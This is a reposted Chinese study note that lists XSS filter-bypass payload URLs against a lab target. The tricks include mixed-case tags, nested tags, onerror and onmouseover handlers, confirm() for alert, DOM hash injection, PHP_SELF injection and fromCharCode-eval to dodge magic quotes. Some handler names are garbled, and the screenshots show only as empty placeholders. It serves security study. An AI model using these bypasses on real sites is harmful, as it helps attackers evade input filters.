【复习】XSS_03_绕过技巧

2021/5/22 18:57:24

编程Tag: php http target XSS com sys 复习 03

本文主要是介绍【复习】XSS_03_绕过技巧,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

xss的绕过技巧

1、大小写绕过
http://target_sys.com/xss/xss04.php?name=<Script>alert(1);</Script>
2、属性多余
http://target_sys.com/xss/xss05.php?name=<script<script>>alert(1);</sc</script>ript>
3、转换标签
http://target_sys.com/xss/xss06.php?name=moon<img src=a one rror=alert(1)>
4、禁用alert
http://target_sys.com/xss/xss07.php?name=<img src="1" one rror="confirm('xss')">
5、js输出
http://target_sys.com/xss/xss08.php?name=moon";alert($a)//
6、js过滤输出
过滤单引号
http://target_sys.com/xss/xss09.php?name=moon';alert($a);//
7、dom输出
http://target_sys.com/xss/xss10.php?name=moon#<script>alert(1);</script>
http://target_sys.com/xss/xss10.php?name=moon#<script>alert(/xss/);</script>
hash 属性是一个可读可写的字符串,该字符串是 URL 的锚部分(从 # 号开始的部分)。
substring 从#开始截取后面的部分
8、urlxss
http://target_sys.com/xss/xss11.php/" οnsubmit="alert('1')
$_SERVER['PHP_SELF'] 
9、过滤特殊字符
php开启gpc之后 
单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线
http://target_sys.com/xss/xss12.php?name=<script>alert(1);</script>
http://target_sys.com/xss/xss12.php?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,13))</script>
10、过滤大小号

http://target_sys.com/xss/xss13.php?name=moon' οnmοuseοver='javascript:alert(1)

一、大小写绕过

在这里插入图片描述

二、属性多余(一次过滤)

在这里插入图片描述

三、转换标签

在这里插入图片描述

四、禁用alert

在这里插入图片描述

五、5、js输出

在这里插入图片描述

六、js过滤输出(过滤单引号)

在这里插入图片描述

七、dom输出

在这里插入图片描述

八、urlxss

在这里插入图片描述

九、过滤特殊字符

php开启gpc之后
单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线

http://target_sys.com/xss/xss12.php?name=<script>alert(1);</script>
http://target_sys.com/xss/xss12.php?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,13))</script>

在这里插入图片描述
在这里插入图片描述

10、过滤大小号

移出鼠标就执行

http://target_sys.com/xss/xss13.php?name=moon' οnmοuseοver='javascript:alert(1)

在这里插入图片描述
在这里插入图片描述



这篇关于【复习】XSS_03_绕过技巧的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


相关编程文章

更多>
本站官方QQ
官方QQ:
23002807

沪ICP备2023033072号-1

     

扫一扫关注最新编程教程